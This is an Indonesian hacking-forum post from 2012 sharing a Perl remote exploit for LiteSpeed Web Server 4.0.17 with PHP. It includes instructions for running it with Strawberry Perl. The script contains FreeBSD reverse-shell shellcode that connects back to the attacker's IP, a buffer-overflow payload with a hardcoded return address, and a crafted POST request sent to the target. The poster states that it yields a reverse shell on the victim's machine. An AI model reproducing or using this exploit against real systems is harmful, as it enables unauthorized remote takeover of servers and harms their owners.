X-code Professional

X-code Community

Facebook group

Instagram X-code

Twitter

X-code Blog

Panel
Welcome! Anonymous

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit

[ { NUM_COMMENT }]

Tempat pembahasan dan tutorial penggunaan tools untuk hacking, security dan forensik komputer.

Moderators: Paman, Xshadow, indounderground

Forum rules
Tool yang diupload oleh member tidak diperiksa oleh kami, mungkin saja terinfeksi oleh malware secara disengaja ataupun tidak, saran kami sebaiknya mendownload tool tersebut dari sumber pembuatnya. Bagi yang buat thread diharapkan menampilkan screenshot tool.

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit

Postby Digital Cat » Tue Jan 10, 2012 10:43 pm

Image


Tool lawas yang mungkin masih berguna..

wat hacking teman2x..

Copy paste di notepad and save as (.pl) / litespeed-remote.pl

and jangan lupa instal dulu perl / kalo saya menggunakan Strawberry Perl

jika binggung dimana harus download mampir ja ke situs Strawberry Perl for Windows
strawberryperl.com

berikut code :

Code: Select all
use IO::Socket;
 
$|=1;
 
#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
        # setreuid, no root here
        "\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
        # connect back :>
        "\x31\xc0\x31\xdb\x53\xb3\x06\x53".
        "\xb3\x01\x53\xb3\x02\x53\x54\xb0".
        "\x61\xcd\x80\x31\xd2\x52\x52\x68".
        "\x41\x41\x41\x41\x66\x68\x01\xbb".
        "\xb7\x02\x66\x53\x89\xe1\xb2\x10".
        "\x52\x51\x50\x52\x89\xc2\x31\xc0".
        "\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
        "\x74\x06\x31\xc0\xb0\x01\xcd\x80".
        "\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
        "\x80\x31\xc0\x31\xdb\x43\x53\x52".
        "\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
        "\x53\x52\x50\xb0\x5a\xcd\x80\x31".
        "\xc0\x50\x68\x2f\x2f\x73\x68\x68".
        "\x2f\x62\x69\x6e\x89\xe3\x50\x54".
        "\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
        "\xb0\x01\xcd\x80";
 
sub usage() {
        print "written by kingcope\n";
        print "usage:\n".
                  "litespeed-remote.pl <target ip/host> <target port>
<your ip> <php file on remote host>\n\n".
                  "example:\n".
                  "perl litespeed-remote.pl 192.168.2.3 8088
192.168.2.2 phpinfo.php\n\n";
 
        exit;
}
 
if ($#ARGV ne 3) { usage; }
 
$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];
 
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
 
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);
 
#my $sock = IO::Socket::INET->new(PeerAddr => $target,
#                                 PeerPort => 8088,
#                                         Proto    => 'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost: 192.168.2.5\r\n\r\n";
 
#$x = <stdin>;
 
#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp
 
my $sock = IO::Socket::INET->new(PeerAddr => $target,
                                  PeerPort => $port,
                                          Proto    => 'tcp');
 
 
$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
$sc = "\x90" x 3000 . $bsdcbsc;
 
print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file?
HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a KINGCOPEH4XXU:\r\n\r\n";
 
while (<$sock>) {
    print;
}


apa yang bisa di maanfaain dari tool ini , kita bisa mendapatkan reverse shell ke mesin korban.
User avatar
Digital Cat
 
Posts: 437
Joined: Fri Jun 26, 2009 6:13 pm
Location: USA

{ FACEBOOK_COMMENT }

Return to Tools For Hacking - Security & Computer Forensic

Who is online

Users browsing this forum: No registered users and 15 guests